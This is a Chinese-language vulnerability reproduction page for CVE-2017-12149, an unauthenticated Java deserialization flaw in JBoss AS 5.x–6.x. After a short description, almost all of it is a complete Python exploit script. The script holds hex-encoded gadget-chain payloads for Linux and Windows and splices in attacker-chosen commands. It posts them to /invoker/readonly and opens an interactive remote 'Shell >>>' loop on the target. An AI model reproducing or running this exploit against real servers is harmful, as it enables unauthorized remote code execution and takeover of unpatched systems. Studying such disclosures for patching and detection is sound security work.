(CVE-2017-12149)JBosS AS 6.X 反序列化漏洞
一、漏洞简介
JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。
二、漏洞影响
JBoss 5.x - 6.x
三、复现过程
poc
cve-2017-12149_cmd.py
#!/usr/bin/python
#-*- coding:utf-8 -*-
import requests
import binascii
import sys
import re
if len(sys.argv)!=2:
print('+---------------------------------------------------------------+')
print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +')
print('+ as https://github.com/1337g/CVE-2017-10271 +')
print('+---------------------------------------------------------------+')
print('+ USE: python <filename> <url> +')
print('+ EXP: python cve-2017-12149_cmd.py http://freeerror.org:8080 +')
print('+ VER: Jboss AS 5.X +')
print('+ Jboss AS 6.X +')
print('+---------------------------------------------------------------+')
sys.exit()
url_in = sys.argv[1]
linux_payload_1 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000"
"7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f"
"6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279"
"8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563"
"743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372"
"002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170"
"2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267"
"2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72"
"6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374"
"696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec"
"287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163"
"68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78"
"707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e"
"732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f"
"72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f"
"72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009"
"69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173"
"734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63"
"6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254"
"72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61"
"76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176"
"612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176"
"612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563"
"743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43"
"6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574"
"2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275"
"71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00"
"18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a"
"fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479"
"71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74"
"6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400052f74"
"6d702f74000074000466696c65707874000b6e6577496e7374616e63657571007e001a00"
"0000017671007e00187371007e00137571007e00180000000174000e52756e436865636b"
"436f6e6669677400096c6f6164436c6173737571007e001a00000001767200106a617661"
"2e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00"
"18000000017571007e001a0000000171007e003371007e001e7571007e001a0000000171"
"007e00207371007e00137571007e001800000001757200135b4c6a6176612e6c616e672e"
"537472696e673badd256e7e91d7b470200007870000000017400"
win_payload_1 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000"
"7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f"
"6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279"
"8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563"
"743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372"
"002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170"
"2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267"
"2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72"
"6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374"
"696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec"
"287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163"
"68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78"
"707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e"
"732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f"
"72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f"
"72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009"
"69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173"
"734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63"
"6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254"
"72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61"
"76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176"
"612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176"
"612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563"
"743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43"
"6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574"
"2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275"
"71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00"
"18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a"
"fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479"
"71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74"
"6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400112f63"
"3a2f77696e646f77732f74656d702f74000074000466696c65707874000b6e6577496e73"
"74616e63657571007e001a000000017671007e00187371007e00137571007e0018000000"
"0174000e52756e436865636b436f6e6669677400096c6f6164436c6173737571007e001a"
"00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078"
"707371007e00137571007e0018000000017571007e001a0000000171007e003371007e00"
"1e7571007e001a0000000171007e00207371007e00137571007e00180000000175720013"
"5b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001"
"7400"
payload_2 = "71007e002a7571007e001a0000000171007e002c737200116a6176612e7574696c2e48617"
"3684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573"
"686f6c6478703f4000000000000077080000001000000000787878"
payload_other = ""
os_type = "unknown"
def build_command_hex(command):
command_exec_hex = "".join("{:02x}".format(ord(c)) for c in command)
command_len = len(command)
command_len_hex = '{:02x}'.format(command_len)
command_hex = command_len_hex + command_exec_hex
return command_hex
def build_payload(target_os, command):
global os_type
if os_type == "unknown":
if target_os == "linux":
payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
if target_os == "windows":
payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
if os_type == "linux":
payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
if os_type == "windows":
payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
return payload
def do_post(payload):
payload_url = url_in + "/invoker/readonly"
result = requests.post(payload_url, payload, verify=False)
result_content = str(result.content)
return result_content
def check_OS():
global os_type
payload_linux = build_payload('linux','whoami')
payload_win = build_payload('windows','whoami')
linux_re = do_post(payload_linux)
win_re = do_post(payload_win)
if "[L291919]" in linux_re:
os_type = 'linux'
if "[W291013]" in win_re:
os_type = 'windows'
return os_type
def run_command(command_in):
payload = build_payload(os_type,command_in)
result = do_post(payload)
result = re.findall ( '](.*?)RunCheckConfig',result, re.DOTALL)
if len(result) == 0:
result.append("command error!\n")
command_callback = result[0]
return command_callback
check_OS()
if os_type =="unknown":
print "[*] Unknown System"
exit(0)
print "***************************************************** \n"
"* Target system is " + os_type + " OS * \n"
"***************************************************** \n"
while 1:
command_in = raw_input("Shell >>> ")
if command_in == "exit" : exit(0)
print run_command(command_in).decode('utf-8')